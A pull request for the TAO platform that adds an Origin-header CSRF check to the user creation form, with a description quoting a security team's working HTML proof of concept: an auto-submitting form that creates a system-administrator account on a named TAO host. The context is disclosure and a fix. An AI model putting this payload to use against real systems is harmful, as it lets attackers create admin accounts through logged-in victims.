### PR TITLE
check origin header

### DIFF
--- a/actions/form/class.Users.php
+++ b/actions/form/class.Users.php
@@ -94,7 +94,8 @@ class tao_actions_form_Users extends tao_actions_form_Instance
     	}
     	
     	$options['topClazz'] = CLASS_GENERIS_USER;
-    	
+    	$options['checkOrigin'] = true;
+
     	parent::__construct($clazz, $this->user, $options);
     }
 

--- a/helpers/class.Http.php
+++ b/helpers/class.Http.php
@@ -383,4 +383,20 @@ class tao_helpers_Http
             header('HTTP/1.1 416 Requested Range Not Satisfiable');
         }
     }
+
+    /**
+     * CSRF Protection via Origin Header. Verify request value matches the tao's origin.
+     * @throws common_exception_BadRequest
+     */
+    public static function checkOrigin()
+    {
+        $request = new Request();
+        if ($request->getMethod() === Request::HTTP_POST && $request->hasHeader('origin')) {
+            $rootInfo = parse_url(ROOT_URL);
+            $originInfo = parse_url($request->getHeader('origin'));
+            if (!isset($originInfo['host']) || $originInfo['host'] !== $rootInfo['host']) {
+                throw new \common_exception_BadRequest("CSRF protection in POST request: detected invalid Origin header: " . $_SERVER["HTTP_ORIGIN"]);
+            }
+        }
+    }
 }

--- a/helpers/form/xhtml/class.Form.php
+++ b/helpers/form/xhtml/class.Form.php
@@ -152,21 +152,23 @@ class tao_helpers_form_xhtml_Form
      */
     protected function validate()
     {
-        $returnValue = (bool) false;
+        $this->valid = true;
 
-        
-		
-		$this->valid = true;
-		
-		foreach($this->elements as $element){
-			if(!$element->validate()){
-				$this->valid = false;
-			}
-		}
-		
-        
+        foreach($this->elements as $element){
+            if(!$element->validate()){
+                $this->valid = false;
+            }
+        }
 
-        return (bool) $returnValue;
+        if (isset($this->options['checkOrigin']) && $this->options['checkOrigin'] === true) {
+            try {
+                \tao_helpers_Http::checkOrigin();
+            } catch (\common_exception_BadRequest $e) {
+                $this->valid = false;
+            }
+        }
+
+        return $this->valid;
     }
 
 }

--- a/manifest.php
+++ b/manifest.php
@@ -27,7 +27,7 @@ return array(
     'label' => 'Tao base',
     'description' => 'TAO meta-extension',
     'license' => 'GPL-2.0',
-    'version' => '5.2.0',
+    'version' => '5.2.1',
     'author' => 'Open Assessment Technologies, CRP Henri Tudor',
     'requires' => array(
         'generis' => '>=2.22.1'

--- a/scripts/update/Updater.php
+++ b/scripts/update/Updater.php
@@ -504,6 +504,8 @@ class Updater extends \common_ext_ExtensionUpdater {
         }
 
         $this->skip('2.22.0', '5.2.0');
+        
+        $this->skip('5.2.0', '5.2.1');
     }
     
     private function migrateFsAccess() {


### PR DESCRIPTION
Security team found this issue:

_Application is vulnerable to CSRF that permits ability to add a new user. An attacker can lure an admin user to an HTML page on a different site that is created to automatically submit a request to create a new user on Workkeys.  This requires social engineering a victim user that has an active session and has admin privileges on Workkeys. The proof of concept below demonstrates how this vulnerability can be used to create an administrator level user._

_CSRF HTML Proof of Concept_

``` html
<form action=""https://act-stress.taocloud.org/tao/Users/add"" method=""post"" name=""main"">
<input type=""hidden"" name=""user_form_sent"" value=""1"">
<input type=""hidden"" name=""tao.forms.instance"" value=""1"">
<input type=""hidden"" name=""http_2_www_0_w3_0_org_1_2000_1_01_1_rdf-schema_3_label"" value=""User+5"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName"" value=""Test"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName"" value=""CSRF"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail"" value=""testcsrf@mailinator.com"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_login"" value=""testcsrf"">
<input type=""hidden"" name=""password1"" value=""P@ssw0rd"">
<input type=""hidden"" name=""password2"" value=""P@ssw0rd"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userDefLg"" value=""http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langen-US"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg"" value=""http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langen-US"">
<input type=""hidden"" name=""http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_0"" value=""http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_SysAdminRole"">
<input type=""hidden"" name="""" value="""">
<input type=""submit"" id=""btn"">
</form>
<script>
  document.forms[0].submit();
</script>
```

The better approach would be implement checking of csrf token for TAO forms, but this is easier solution. I guess we can implement checking of token later.
